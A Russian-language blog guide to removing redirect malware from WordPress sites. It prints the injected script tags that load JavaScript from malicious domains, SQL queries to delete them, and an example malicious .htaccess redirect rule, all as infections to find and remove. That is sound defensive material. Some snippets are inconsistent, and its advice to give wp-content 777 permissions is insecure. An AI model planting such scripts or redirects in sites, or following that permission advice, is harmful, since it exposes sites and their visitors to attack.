Как вылечить сайт от вирусов wordpress

Если ваш WordPress сайт взломали и при его открытии происходит редирект на другой сайт, то эта статья для вас. Мы расскажем, как удалить вирус редиректа на WordPress сайте.

На данный момент, вирус редиректа перенаправляет посетителей зараженного WordPress сайта на directednotconverted.ml, lowerbeforwarden.ml, donatelloflowfirstly.ga. Давайте разберемся и удалим это вредоносное перенаправление с вашего сайта.

Данный тип вредоносного ПО вставляет JavaScropt-редирект на каждую страницу и запись сайта. Поэтому, когда посетители заходят на вашу главную страницу или любую другую, они перенаправляются на вредоносный сайт с помощью JavaScript.

Список популярных вредоносных сайтов, которыми заражаются WordPress сайты:

• source.lowerbeforwarden.ml.
• scripts.lowerbeforwarden.ml.
• donatelloflowfirstly.ga.
• js.donatelloflowfirstly.ga.
• Source.lowerbeforwarden.ml.
• 0.directednotconverted.ml.
• go.donatelloflowfirstly.ga.

Почему WordPress сайт заражается вирусом редиректа?

Все мы знаем, что WordPress – это самая популярная CMS для ведения блогов. Именно поэтому, WP интересен взломщикам, чтобы распространять свои вирусы и получать из этого выгоду.

Зачастую, вирус на сайт попадает, если вы пользуетесь не лицензионным, взломанным (Nulled) программным обеспечением. Это могут быть плагины, в которых открыт расширенный функционал, либо премиум шаблоны, которые отвязаны от лицензии.

Если вы установили тему из не проверенного источника, то воспользуйтесь плагином проверки на вирусы TOC.

Но вирусы могут попасть на ваш сайт не только из взломанных плагинов или тем. Хакерам также интересны уязвимости в популярных плагинах, ведь их используют миллионы пользователей по всему миру.

Например, недавно была обнаружена уязвимость в плагине WordFence. Да-да, в том плагине, который включает в себя функции защитника от спама, вирусов и атак. Хакеры воспользовались этой уязвимостью и на миллионы сайтов получили вирус с редиректом на другие вредоносные веб-сайты.

Именно поэтому мы рекомендуем всегда обновляться до актуальной версии WordPress, использовать последнии версии плагинов и шаблонов.

Как удалить вирус редиректа с WordPress сайта

Первое, что нужно сделать, это подключиться к своему сайту по FTP или зайди в файловый менеджер на вашем хостинге. Перейдите в папку public_html вашего сайта. Если вы найдете файлы с именами _a , _f , _s, то удалите их, это вредоносное ПО.

Проверьте папку с плагинами и темами, если вы найдете какой-либо неизвестный файл PHP или JavaScript, то удалите этот файл.

Откройте файл index.php, такой файл может находиться в /wp-content/plugins/index.php или public_html/index.php. Найдите в этом файле такой код <script src = ‘*****’ type = ‘text / javascript’> </script>.

Пример:

<script src=’https://scripts.lowerbeforwarden.m/src.js?n=n’ type=’text/javascript’></script>

<script src=’https://js.donatelloflowfirstly.g/statistics.js?n=n’ type=’text/javascript’></script>

Удалите этот код, если вы его найдете. Вы также можете найти этот код в конце каждой вашей страницы или поста в редакторе записей в админке сайта. Также этот код может находиться в шаблонах записей, страниц и index.php.

Откройте phpMyAdmin и выберите свою базу данных. Откройте таблицу wp_post. Отредактируйте любой пост и посмотрите, есть ли этот скрипт или нет.

Чтобы удалить вредоносный код из всех записей на сайте, вам нужно открыть phpMyAdmin и выбрать имя своей базы данных. Далее запустите SQL-запрос, чтобы удалить вредоносный кусок кода. В нашем случае мы нашли 2 вредоносных скрипта:

<script src=’https://scripts.lowerbeforwarden.ml/src.js?n=ns125′ type=’text/javascript’></script> <script src=’https://js.donatelloflowfirstly.ga/statistics.js?n=ns125′ type=’text/javascript’></script>

Чтобы удалить lowerbeforwarden.ml

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://scripts. lowerbeforwarden.ml/src.js?n=ns125′ type=’text/javascript’></script>”, “”));

Чтобы удалить js.donatelloflowfirstly.ga

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns125′ type=’text/javascript’></script>”, “”));

Если вы нашли вредоносный скрипт в вашей записи, то составьте такой же запрос, только замените часть SQL-запроса под нужный вам.

UPDATE wp_posts SET post_content = (REPLACE (post_content, “Вставьте сюда вредоносный скрипт“, “”));

Этот запрос будет работать для всех вредоносный запросов. Просто адаптируйте его под себя.

Как удалить вирус редиректа при открытии сайта

Также вирусы с редиректом часто заменяют адрес домашней страницы. Это делают следующие вредоносные сайты:

• donatelloflowfirstly.ga
• 0.directednotconverted.ml

Чтобы это исправить, вам нужно отредактировать поля siteurl и home в таблице wp_options вашей базы данных. Убедитесь, что в этих полях указан адрес вашего домене.

Например, вы можете увидеть на скриншоте ниже, как вредоносный код на сайте заменил адрес сайта и вписал туда адрес вирусного скрипта. Если вы увидите такой скрипт у себя в базе данных – удаляйте его и вписывайте свой адрес сайта.

https://js.donatelloflowfirstly.ga/statistics.js?n=ns2

Проделав все эти действия, вы сможете удалить вирусы directednotconverted.ml и lowerbeforwarden.ml с вашего WordPress сайта.

За основу данной статьи взят данный материал – https://crazytechgo.com.

Мы часто видим, как многие пользователи задают нам вопросы по поводу непонятный редиректов на их WordPress сайте. Надеемся, что эта статья помогла вам и в будущем вы больше не столкнетесь с данной проблемой.

???? Научим создавать сайты на WordPress бесплатно за 19 уроков. Подробнее →

Вирусом называется вредоносный код, призванный нарушить работу сайта или втайне передать внешнему источнику какие-либо конфиденциальные данные.

Почему появляются вирусы в WordPress?

Благодаря удобному и быстрому процессу создания рабочего сайта, бесплатная платформа WordPress уже завоевала большую популярность не только среди блогеров, но также и веб-разработчиков. Огромное количество бесплатных плагинов и тем позволяют построить не только простой новостной сайт, но также интернет-магазин или онлайн-кинотеатр. Но огромное количество сайтов на основе этой CMS имеют определенные уязвимости в системе безопасности. Наиболее подвержены как раз таки плагины и темы.

Как обнаружить вирус на сайте?

Наличие вредоносного кода рано или поздно даст о себе знать: некорректная статистика посещаемости, переадресация на сторонние ресурсы, наличие сторонних рекламных ссылок или иного контента, сообщения поисковых систем о наличии вредоносного кода, “тормоза” в работе сайта и др.

Как удалить вирус?

Во-первых, нужно определить, где скрывается вирус. Наиболее частые места для внедрения вредоносного кода – это плагины, темы. Также могут быть изменены файлы самого WordPress.

Ниже приведены несколько рекомендаций, которые помогут обнаружить и удалить вредоносный код, а также обезопасят от заражения в будущем.

Сразу следует отметить, что перед какими-либо действиями следует делать полную резервную копию сайта.

1. Обновите WordPress, темы и плагины до последних версий.

2. Удалите неиспользуемые темы и плагины.

3. Проверьте наличие сторонних файлов каталоге сайта (сравнения можно скачать с официального сайта WordPress копию движка).

4. Отследите даты измененных файлов. Например, основные каталоги WordPress – это wp-includes, wp-admin. Они должны иметь одну и ту же дату создания. Если в них обнаружился один или несколько файлов с более поздней датой создания, следует сравнить их содержимое со скачаной копией движка и выяснить, что из себя представляют лишние фрагменты кода.

5. Проверьте на присутствие стороннего кода с помощью плагина Exploit Scanner. После установки и активации в админ-панели следует перейти Инструменты -> Exploit Scanner, нажать кнопку Run the Scan.

После окончания сканирования плагин выдаст результаты. Следует внимательно изучить информацию. Отметим, что плагин ничего сам не исправляет и не удаляет. Этот процесс необходимо будет провести вручную.

6. Просмотрите страницы и посты. Если где-то Вы увидели какую-то подозрительную информацию, то можно просто ее удалить, открыв на редактирование.

7. Проверьте тему с помощью плагина Theme Authenticity Checker (TAC). После установки и активации плагина в админ-панели следует перейти Внешний вид -> TAC. В окне Вы увидите список присутствующих на сайте тем с наличием/отсутствием в них проблем.

8. Проверка файла .htaccess в корневом каталоге сайта. Исследуя этот файл, необходимо обращать внимание на сторонние ссылки. Примером ссылки на неизвестный сайт может послужить следующий код:

RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteRule ^(.*)$ https://неизвестныйсайт.com/ [R=301,L]

Как обезопасить свой сайт от вирусов?

Следуя этим рекомендациям, Ваш сайт всегда будет защищен от сторонних вмешательств.

1. Никогда не используйте установленные по умолчанию имена администратора типа admin, administrator.
2. Установите капчу (например, Google Captcha (reCAPTCHA) by BestWebSoft), которая защитит от подбора паролей к формам на сайте.
3. Пароли пользователей сайта должны иметь не менее 8 символов.
4. Регулярно создавайте резервные копии сайта, так это позволит быстро восстановить сайт в случае падения.
5. Устанавливайте плагины только из официального WordPress-репозитария.
6. Всегда обновляйте до последних версий сам движок, плагины и темы.
7. Закрывайте регистрацию/комментирование для пользователей на сайте, если они не нужны.
8. Удалите файл readme.html из корневого сайта, в котором хранится версия Вашего движка.
9. Зарегистрируйте Ваш сайт в панели администратора поисковых систем, чтобы всегда быть в курсе состояния безопасности сайта.
10. Проверяйте права для каталогов и файлов сайта. Для всех каталогов они должны быть 755 (только wp-content имеет права 777), для файлов – 644.

Нажмите, пожалуйста, на одну из кнопок, чтобы узнать понравилась статья или нет.